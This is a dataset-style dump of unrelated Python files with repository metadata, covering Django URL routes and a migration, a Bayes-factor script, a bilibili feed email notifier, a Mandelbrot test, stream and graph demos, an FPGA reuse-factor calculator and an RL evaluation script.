| 23.794118 | 96 | 0.611867 | 110 | 809 | 4.418182 | 0.5 | 0.090535 | 0.049383 | 0.082305 | 0.152263 | 0.152263 | 0.152263 | 0 | 0 | 0 | 0 | 0.008224 | 0.248455 | 809 | 33 | 97 | 24.515152 | 0.791118 | 0.311496 | 0 | 0 | 0 | 0 | 0.056842 | 0 | 0 | 0 | 0 | 0.030303 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9bccca00ad377e38355adc4cdf7e077d4479ca | 1,880 | py | Python | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | from django.conf.urls import include, url
from django.contrib.auth.decorators import login_required
from .. import views
app_name = 'lnldb'
# prefix: /my/
urlpatterns = [
    # Workorder list for the current user, plus the external attachment flow.
    url(r'^workorders/$', views.my.mywo, name="workorders"),
    url(r'^workorders/attach/(?P<id>[0-9]+)/$', views.flow.assignattach_external, name="event-attach"),
    # Office-hours display and editing.
    url(r'^office-hours/$', views.my.office_hours, name="office-hours"),
    url(r'^office-hours/update/$', views.my.hours_update, name="hours-update"),
    # Organization management: listing, requests, editing, ownership transfer.
    url(r'^orgs/', include([
        url(r'^$', views.my.myorgs, name="orgs"),
        url(r'^form/$', views.my.myorgform, name="org-request"),
        url(r'^(?P<id>[0-9a-f]+)/$', views.orgs.orgedit, name="org-edit"),
        url(r'^transfer/(?P<id>[0-9]+)/$', views.orgs.org_mkxfer, name="org-transfer"),
        url(r'^transfer/(?P<idstr>[0-9a-f]+)/accept/$', views.orgs.org_acceptxfer,
            name="org-accept"),
    ])),
    # Per-event views scoped to the current user.
    url(r'^events/', include([
        url(r'^$', views.my.myevents, name="events"),
        # TODO: merge these with their events equivalents.
        url(r'^(?P<eventid>[0-9]+)/files/$', views.my.eventfiles, name="event-files"),
        url(r'^(?P<eventid>[0-9]+)/report/$', views.my.ccreport, name="report"),
        url(r'^(?P<eventid>[0-9]+)/hours/$', views.my.hours_list, name="hours-list"),
        url(r'^(?P<eventid>[0-9]+)/hours/bulk/$', views.my.hours_bulk,
            name="hours-bulk"),
        url(r'^(?P<eventid>[0-9]+)/hours/mk/$', views.my.hours_mk,
            name="hours-new"),
        url(r'^(?P<eventid>[0-9]+)/hours/(?P<userid>[0-9]+)$', views.my.hours_edit,
            name="hours-edit"),
        # Post-event survey requires login; other routes rely on upstream auth.
        url(r'^(?P<eventid>[0-9]+)/survey/$', login_required(views.my.PostEventSurveyCreate.as_view()),
            name="post-event-survey"),
        url(r'^survey/success/$', views.my.survey_success, name="survey-success"),
    ])),
]
| 42.727273 | 103 | 0.589362 | 267 | 1,880 | 4.097378 | 0.273408 | 0.073126 | 0.036563 | 0.076782 | 0.159049 | 0.107861 | 0.06947 | 0 | 0 | 0 | 0 | 0.015296 | 0.165426 | 1,880 | 43 | 104 | 43.72093 | 0.681963 | 0.032447 | 0 | 0.060606 | 0 | 0 | 0.344163 | 0.190529 | 0 | 0 | 0 | 0.023256 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9d366bd7ef0370059c3ee36ddc5d684a58e7bd | 3,463 | py | Python | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
] | 9 | 2016-11-21T13:38:59.000Z | 2021-11-16T04:03:57.000Z | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
] | 1 | 2017-02-27T23:11:54.000Z | 2017-07-31T17:55:25.000Z | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
] | 2 | 2020-04-06T11:45:05.000Z | 2020-12-17T16:50:04.000Z | import doseresponse as dr
import numpy as np
from glob import glob
import itertools as it
import os
import argparse
import sys
import multiprocessing as mp
def compute_log_py_approxn(temp):
    """Monte-Carlo estimate of the expected log-likelihood under the MCMC
    chain sampled at tempering value `temp` (for thermodynamic integration).

    NOTE(review): Python 2 source (print statements, xrange). Reads the
    module-level globals m, top_drug, top_channel, responses, where_r_0,
    where_r_100, where_r_other, concs and pi_bit set up below — confirm
    they are initialized before calling.
    """
    print temp
    # Locate the saved chain file for this (model, drug, channel, temp).
    drug,channel,chain_file,images_dir = dr.nonhierarchical_chain_file_and_figs_dir(m, top_drug, top_channel, temp)
    chain = np.loadtxt(chain_file, usecols=range(dr.num_params))
    num_its = chain.shape[0]
    total = 0.
    start = 0
    # NOTE(review): the loop variable `it` shadows the module alias
    # `import itertools as it`; harmless inside this function since
    # itertools is not used here.
    for it in xrange(start,num_its):
        temperature = 1 # approximating full likelihood
        temp_bit = dr.log_data_likelihood(responses, where_r_0, where_r_100, where_r_other, concs, chain[it, :], temperature, pi_bit)
        total += temp_bit
        if temp_bit == -np.inf:
            print chain[it, :]
    # Average log-likelihood over the retained iterations.
    answer = total / (num_its-start)
    if answer == -np.inf:
        print "ANSWER IS -INF"
    return answer
parser = argparse.ArgumentParser()
parser.add_argument("-nc", "--num-cores", type=int, help="number of cores to parallelise drug/channel combinations", default=1)
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("-d", "--drug", type=int, help="drug index", required=True)
requiredNamed.add_argument("-c", "--channel", type=int, help="channel index", required=True)
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
num_models = 2
model_pairs = it.combinations(range(1, num_models+1), r=2)
expectations = {}
dr.setup(args.data_file)
top_drug = dr.drugs[args.drug]
top_channel = dr.channels[args.channel]
num_expts, experiment_numbers, experiments = dr.load_crumb_data(top_drug, top_channel)
concs = np.array([])
responses = np.array([])
for i in xrange(num_expts):
concs = np.concatenate((concs, experiments[i][:, 0]))
responses = np.concatenate((responses, experiments[i][:, 1]))
where_r_0 = responses==0
where_r_100 = responses==100
where_r_other = (responses>0) & (responses<100)
pi_bit = dr.compute_pi_bit_of_log_likelihood(where_r_other)
num_pts = where_r_other.sum()
for m in xrange(1, num_models+1):
dr.define_model(m)
temps = (np.arange(dr.n+1.)/dr.n)**dr.c
num_temps = len(temps)
if args.num_cores == 1:
log_p_ys = np.zeros(num_temps)
for i in xrange(num_temps):
log_p_ys[i] = compute_log_py_approxn(temps[i])
elif args.num_cores > 1:
pool = mp.Pool(args.num_cores)
log_p_ys = np.array(pool.map_async(compute_log_py_approxn, temps).get(9999))
pool.close()
pool.join()
print log_p_ys
expectations[m] = dr.trapezium_rule(temps, log_p_ys)
print expectations
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
if not os.path.exists(bf_dir):
os.makedirs(bf_dir)
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
for pair in model_pairs:
i, j = pair
#print expectations[i], expectations[j]
Bij = np.exp(expectations[i]-expectations[j])
#print Bij
#with open("{}_{}_BF.txt".format(drug,channel), "w") as outfile:
# outfile.write("{} + {}\n".format(drug,channel))
# outfile.write("B_{}{} = {}\n".format(i, j, Bij))
# outfile.write("B_{}{} = {}\n".format(j, i, 1./Bij))
np.savetxt(bf_file, [Bij])
| 33.298077 | 153 | 0.688132 | 533 | 3,463 | 4.253283 | 0.290807 | 0.021173 | 0.013233 | 0.025143 | 0.145567 | 0.093516 | 0.057345 | 0.057345 | 0.057345 | 0.057345 | 0 | 0.014998 | 0.172105 | 3,463 | 103 | 154 | 33.621359 | 0.775724 | 0.085764 | 0 | 0 | 0 | 0 | 0.079239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.103896 | null | null | 0.077922 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9e79d289f9458ec61d577f158e33314ed0402c | 4,520 | py | Python | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | 2 | 2020-03-03T15:43:10.000Z | 2020-03-03T16:25:56.000Z | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | null | null | null | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | null | null | null |
#################################################
### THIS FILE WAS AUTOGENERATED! DO NOT EDIT! ###
#################################################
# file to edit: ./bilibili.ipynb
from nbexp_personal import sendEmail
def itemgetter(*keys):
    """Like operator.itemgetter, but the returned callable yields a dict.

    itemgetter('a', 'b')(obj) -> {'a': obj['a'], 'b': obj['b']}

    NOTE: with a single key operator.itemgetter returns a scalar, so the
    zip below expects two or more keys.
    """
    raw_getter = operator.itemgetter(*keys)
    def pick(*objs):
        return dict(zip(keys, raw_getter(*objs)))
    return pick
def write_json(filename, content):
    """Serialize `content` to `filename` as pretty-printed UTF-8 JSON."""
    with open(filename, 'w', encoding='UTF-8') as fp:
        json.dump(content, fp, ensure_ascii=False, indent=4)
def read_json(filename):
    """Load and return the JSON content of `filename` (UTF-8)."""
    with open(filename, 'r', encoding='UTF-8') as fp:
        return json.load(fp)
# 复制为cCURL(posix)
def read_code(code_path):
    """Return the first line of the saved cURL command file."""
    with open(code_path, 'r', encoding='UTF-8') as fp:
        first_line = fp.read().split('\n')[0]
    return first_line
code =read_code('../bili_curl.txt')
import nbexp_uncurl
import requests
from functools import partial
def fetch_code(code):
    """Run a copied browser cURL command and return the JSON response body.

    `nbexp_uncurl.parse` converts the cURL text into Python source for a
    `requests` call (5-second default timeout), which is then executed
    with eval().

    WARNING(security): eval() executes whatever the parser emits — only
    feed this trusted cURL text copied by the user themselves.
    """
    c =nbexp_uncurl.parse(code, timeout=5)
    r = eval(c)
    j = r.json()
    return j
import operator
import json
import datetime
def get_time(timestamp):
    """Convert a Unix timestamp to an ISO-8601 string (local time)."""
    moment = datetime.datetime.fromtimestamp(timestamp)
    return moment.isoformat()
def cvt_cards(j):
    """Convert a raw bilibili dynamic-feed response into {aid: card_info}.

    NOTE(review): field paths follow bilibili's (undocumented) dynamic
    feed schema as used here — confirm against the live API before
    changing them.
    """
    cards = j['data']['cards']
    # Uploader display names live under desc.user_profile.info.
    unames = list(map(lambda card:card['desc']['user_profile']['info']['uname'], cards))
    # The 'card' field is itself a JSON-encoded string; decode each one.
    cards = list(map(operator.itemgetter('card'), cards))
    cards = list(map(json.loads, cards))
    kl = ('title', 'desc', 'pic', 'stat', 'ctime')
    # NOTE: this calls the module-local dict-returning itemgetter defined
    # above, not operator.itemgetter.
    cards = list(map(itemgetter(*kl), cards))
    def cvt(tp):
        # Build (aid, info): display content, video URL, ISO timestamp
        # and uploader name.
        card, uname = tp
        content_id = str(card['stat']['aid'])
        content = itemgetter(*kl[:-2])(card)
        # '@64w_36h_1c.jpg' asks bilibili's image CDN for a thumbnail.
        pic = content['pic'] + '@64w_36h_1c.jpg'
        content['pic'] = pic
        d = get_time(card['ctime'])
        url = 'https://www.bilibili.com/video/av' + content_id
        return (content_id, {'content': content , "url":url , 'time':d, 'uname':uname } )
    cards = dict((map(cvt, zip(cards, unames))))
    return cards
def get_cards():
    """Fetch the dynamic feed via the saved cURL command and convert it."""
    raw = fetch_code(code)
    return cvt_cards(raw)
def render_div(v):
    """Render one card as an inline-styled HTML <div> snippet."""
    card = v['content']
    desc = card['desc']
    if len(desc) > 50:
        # Truncate long descriptions to 20 chars plus an ellipsis.
        desc = desc[:20]+'...'
    return f"""
<div style="margin:10px">
<img src='{card['pic']}'>
<a href='{v['url']}'>{card['title']}</a>
<span>{desc} {v['time']}</span>
</div>
"""
def render_html(v_list):
    """Assemble a minimal HTML page from the rendered card divs."""
    divs = ''.join(render_div(item) for item in v_list)
    return f"""\
<html>
<head></head>
<body>
{divs}
</body>
</html>
"""
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Create the body of the message (a plain-text and an HTML version).
def render_msg(v_list, sub_name=""):
    """Build a MIME email (HTML body) announcing the new cards.

    The subject is "<sub_name>订阅+<count>"; From is the subscription
    name and To is left blank for the sender to fill in.
    """
    v_list = list(v_list)  # may be a generator; materialize for len()
    msg = MIMEMultipart('alternative')
    msg['Subject'] = sub_name + '订阅' + '+' + str(len(v_list))
    msg['From'] = sub_name
    msg['To'] = ''
    # Attach the HTML rendering as the single alternative part.
    body_html = render_html(v_list)
    msg.attach(MIMEText(body_html, 'html'))
    return msg.as_string()
def get_main(json_path, get_cards, sub_name=""):
    """Build the subscription driver.

    json_path  -- where the previously-seen cards are read from and the
                  merged history is written back.
    get_cards  -- callable returning the current {id: card} mapping.
    sub_name   -- label used in the notification email subject/from.
    """
    def main():
        # Fetch current cards, diff against history, email anything new,
        # then persist the merged history.
        cards = get_cards()
        wj = partial( write_json, json_path,)
        rj = partial( read_json, json_path,)
        if not exists(json_path):
            # First run: no history yet, so every card counts as new.
            wj({})
        old_cards = rj()
        new_cards = filter(lambda tp:tp[0] not in old_cards, cards.items())
        new_cards = map(operator.itemgetter(1), new_cards)
        new_cards = list(new_cards)
        if new_cards:
            msg = render_msg(new_cards, sub_name)
            sendEmail(msg)
        old_cards.update(cards)
        wj(old_cards)
    return main
def block_on_观视频工作室(tp):
    """Filter predicate over (aid, card) pairs.

    Keeps every card except those from uploader 观视频工作室 whose title
    does not mention 睡前消息 — i.e. only that uploader's 睡前消息 series
    gets through.
    """
    _, card = tp
    return (card['uname'] != '观视频工作室'
            or '睡前消息' in card['content']['title'])
def filter_get_cards():
    """get_cards(), minus entries rejected by block_on_观视频工作室."""
    fetched = get_cards()
    kept = {k: v for k, v in fetched.items() if block_on_观视频工作室((k, v))}
    return kept
from os.path import exists
# Persisted card history lives next to the script.
json_path = './bili.json'
# Wire up the "bili" subscription: filtered fetch + history diff + email.
main = get_main(json_path, filter_get_cards, "bili")
if __name__ == '__main__': main()
8fa773d3da48d404608fe06cb4c8e55711ac793c | 239 | py | Python | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from mandlebrot import mandelbrot
def test_mandelbrot_incorrect_test():
    """mandelbrot() should yield an all-zero grid over this sample window."""
    xs = np.linspace(-1.5, -2.0, 10)
    ys = np.linspace(-1.25, 1.25, 10)
    grid = mandelbrot(xs, ys, 100, False)
    assert np.all(grid == 0.0)
assert np.all(output == 0.0) | 29.875 | 41 | 0.665272 | 41 | 239 | 3.804878 | 0.585366 | 0.128205 | 0.141026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098446 | 0.192469 | 239 | 8 | 42 | 29.875 | 0.709845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8faa5150622f7a7260386468cdf1dd80f3148292 | 245 | py | Python | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 7 | 2022-01-24T23:21:15.000Z | 2022-03-26T20:51:16.000Z | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 9 | 2022-01-17T12:27:34.000Z | 2022-03-31T13:11:57.000Z | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 3 | 2022-02-08T11:24:43.000Z | 2022-03-30T14:50:57.000Z | from quixstreaming import ParameterData
class QuixFunction:
    """Stream handler that dumps incoming parameter data to stdout."""

    # Callback invoked once for every new batch of parameter data.
    def on_parameter_data_handler(self, data: ParameterData):
        frame = data.to_panda_frame()
        print(frame.to_string())
| 22.272727 | 61 | 0.726531 | 30 | 245 | 5.733333 | 0.766667 | 0.151163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204082 | 245 | 10 | 62 | 24.5 | 0.882051 | 0.191837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8fb3fcc41834373888df11ca3beac35e76e07acb | 610 | py | Python | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import sys, time
from domo import DomoApp, DomoLog
# Create the single top-level application object; it constructs and owns
# the rest of the system's objects.
myapp = DomoApp.DomoApp()
# NOTE(review): the try/except/finally scaffolding is commented out and
# replaced by `if 1 == 1:`, presumably so exceptions surface with a full
# traceback during debugging; restore it for production use.
#try:
if 1 == 1:
    '''first thing we do is to create the main object
    which in turn will create the rest of the objects'''
    DomoLog.log('INFO', 'main', 'starting threads')
    myapp.run()
    i = 0
    # Keep the main thread alive (~20s) while the app's threads run.
    # (Python 2 print statement — this file targets Python 2.)
    while i < 2:
        print "i is " + str(i)
        time.sleep(10)
        i = i + 1
#except:
#    print "FATAL: {0}".format(sys.exc_info()[0])
#    DomoLog.log('ERROR', 'main', 'caught exception')
#finally:
myapp.cleanup()
DomoLog.log('INFO', 'main', 'clean exit')
| 21.034483 | 59 | 0.598361 | 89 | 610 | 4.089888 | 0.629213 | 0.082418 | 0.076923 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.247541 | 610 | 28 | 60 | 21.785714 | 0.77342 | 0.254098 | 0 | 0 | 0 | 0 | 0.138643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fb571fde8880cb6b3ed3ef3fdd2b031759c7a96 | 485 | py | Python | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | 4 | 2022-01-18T00:41:39.000Z | 2022-02-04T09:45:29.000Z | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | null | null | null | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | 1 | 2019-01-06T12:56:32.000Z | 2019-01-06T12:56:32.000Z | import xmlrpclib
import time
# Create an object to represent our server.
server_url = 'http://127.0.0.1:20738/RPC2'
server = xmlrpclib.Server(server_url)
G = server.ubigraph
G.clear()
x = G.new_vertex()
y = G.new_vertex()
G.set_edge_style_attribute(0, "spline", "true")
G.set_vertex_style_attribute(0, "shape", "sphere")
G.set_vertex_style_attribute(0, "size", "0.3")
G.set_vertex_style_attribute(0, "color", "#FFDB25")
for i in range(0,20):
G.new_edge(x,y)
time.sleep(0.4)
| 20.208333 | 51 | 0.717526 | 86 | 485 | 3.848837 | 0.5 | 0.048338 | 0.181269 | 0.135952 | 0.226586 | 0.226586 | 0 | 0 | 0 | 0 | 0 | 0.058411 | 0.117526 | 485 | 23 | 52 | 21.086957 | 0.714953 | 0.084536 | 0 | 0 | 0 | 0 | 0.151927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fbadd797079a59bb7c16b5b056dc3c3435e7089 | 1,390 | py | Python | tools/reuse_factors_examples.py | walkieq/LSTM-HLS | f90bc769153e667eb8a30c7c4147bd53620f02bb | [
"Apache-2.0"
] | 18 | 2021-06-17T18:25:02.000Z | 2022-03-29T09:30:50.000Z | tools/reuse_factors_examples.py | vamsikrishnabodaballa/RNN_HLS | 892b5315c27953af7dc387f4df5475962178201a | [
"Apache-2.0"
] | 3 | 2021-10-30T17:48:04.000Z | 2022-01-08T21:03:40.000Z | tools/reuse_factors_examples.py | vamsikrishnabodaballa/RNN_HLS | 892b5315c27953af7dc387f4df5475962178201a | [
"Apache-2.0"
] | 5 | 2021-06-17T18:25:06.000Z | 2022-03-17T11:05:54.000Z | import math
import numpy as np
"""
This function calculates the roots of the quadratic inequality for the Rh reuse factor.
Parameters:
lx - list of input sizes of the lstms. The size of this list is equal to the number of layers.
lh - list of input sizes of the hidden layers. The size of this list is equal to the number of layers.
lt_sigma - the latency of the sigmoid/tanh functions.
lt_tail - the latency of the tail.
dsp_total - the total number of dsps
This returns the roots of the quadratic inequality.
"""
def reuse_factor(lx, lh, lt_sigma, lt_tail, dsp_total):
    """Return the two roots of the quadratic inequality for the Rh reuse factor.

    Parameters
    ----------
    lx : list
        Input sizes of the LSTMs, one entry per layer.
    lh : list
        Input sizes of the hidden layers, one entry per layer.
    lt_sigma : number
        Latency of the sigmoid/tanh functions.
    lt_tail : number
        Latency of the tail.
    dsp_total : number
        Total number of DSPs.

    Returns
    -------
    tuple
        The two roots (r_1, r_2) of the quadratic inequality.
    """
    lt = lt_sigma + lt_tail  # combined latency appears in every coefficient
    a = dsp_total - 4 * sum(lh)
    b = dsp_total * lt - 4 * np.dot(lx, lh) - 4 * np.dot(lh, lh) - 4 * lt * sum(lh)
    c = -4 * lt * np.dot(lh, lh)
    # Compute the discriminant once instead of once per root.
    disc = math.sqrt(b ** 2 - 4 * a * c)
    r_1 = (-b + disc) / (2 * a)
    r_2 = (-b - disc) / (2 * a)
    return r_1, r_2
# Example sweeps: print candidate reuse-factor roots for several FPGA boards.
# NOTE: the 'exmaple' spelling below is part of the printed output and is
# kept byte-for-byte.

# ZYNQ board: two-layer network, 220 DSPs (and a 900-DSP variant).
print("ZYNQ")
print(reuse_factor([1,9],[9,9], 3,8,220))
print("lstm_ae_small exmaple")
print(reuse_factor([1,9],[9,9], 3,8,900))
print("\n")

# KU115 board: MNIST one- and two-layer examples, 5520 DSPs.
print("KU115")
print("mnist 1/2 layers examples")
print(reuse_factor([28],[32], 3,8,5520))
print(reuse_factor([28,16],[16,16], 3,8,5520))
print("\n")

# U250 board: four-layer LSTM autoencoder, 12200 DSPs.
print("U250")
print("lstm_ae exmaple")
print(reuse_factor([1,32,8,8],[32,8,8,32], 3,8,12200))
| 28.367347 | 119 | 0.627338 | 256 | 1,390 | 3.300781 | 0.292969 | 0.091124 | 0.094675 | 0.061538 | 0.386982 | 0.31716 | 0.191716 | 0.191716 | 0.191716 | 0.139645 | 0 | 0.076007 | 0.214388 | 1,390 | 48 | 120 | 28.958333 | 0.697802 | 0.023022 | 0 | 0.090909 | 0 | 0 | 0.095941 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0.590909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
8fbe2b88fe74cf906d86d3d7c7460534f06760eb | 1,318 | py | Python | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | 3 | 2021-08-31T01:09:39.000Z | 2022-01-05T06:00:33.000Z | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | null | null | null | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | 1 | 2022-01-05T06:00:36.000Z | 2022-01-05T06:00:36.000Z | import os
import time
from collections import deque
import functools
import itertools
from typing import Callable, Iterable
import numpy as np
import yaml
import gym
from box import Box
import torch
# torch.multiprocessing.set_start_method("forkserver")
import torch.nn as nn
from torch.utils.data import IterableDataset, DataLoader
from torch import optim
from a2c_ppo_acktr import algo, utils
from a2c_ppo_acktr.envs import make_vec_envs
from a2c_ppo_acktr.utils import get_vec_normalize
from a2c_ppo_acktr.model import Policy
from a2c_ppo_acktr.storage import RolloutStorage
from evaluation import evaluate
def main():
    """Load the trained policy checkpoint and run evaluation on it."""
    with open("seaadrl.yaml") as cfg_file:
        raw_cfg = yaml.load(cfg_file, Loader=yaml.FullLoader)
    config = Box(raw_cfg["baseline"])

    device = utils.get_device()

    # Restore the "-vaxxed_2" checkpoint for this environment.
    checkpoint_path = os.path.join(config.load_dir, config.env_name + "-vaxxed_2.pt")
    trained_agent, _ = torch.load(checkpoint_path, map_location=device)
    trained_agent.eval()

    evaluate(
        trained_agent,
        None,
        config.env_name,
        seed=1,
        num_processes=24,
        eval_log_dir='/tmp/gym',
        device=utils.get_device(),
    )


if __name__ == "__main__":
    main()
8fd112385e85f60302d92c1ec0b726f196a2d2f8 | 964 | py | Python | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | null | null | null | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | 12 | 2020-02-12T06:26:55.000Z | 2022-02-13T05:52:54.000Z | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | 8 | 2020-02-24T05:11:18.000Z | 2021-02-26T07:54:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2020-08-17 09:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (Django 1.10.8, 2020-08-17): adds the
    # filming-licence charge fields to the Proposal model.

    dependencies = [
        ('commercialoperator', '0085_proposaleventotherdetails_other_comments'),
    ]

    operations = [
        # Charge-type selector; defaults to a full-day charge.
        migrations.AddField(
            model_name='proposal',
            name='filming_licence_charge_type',
            field=models.CharField(choices=[('half_day_charge', 'Half day charge'), ('full_day_charge', 'Full day charge'), ('2_days_charge', '2 days charge'), ('3_or_more_days_charge', '3 or more days charge')], default='full_day_charge', max_length=30, verbose_name='Filming Licence charge Type'),
        ),
        # Free-form amount used when none of the standard rates apply.
        migrations.AddField(
            model_name='proposal',
            name='filming_non_standard_charge',
            field=models.DecimalField(decimal_places=2, default='0.00', max_digits=8),
        ),
    ]
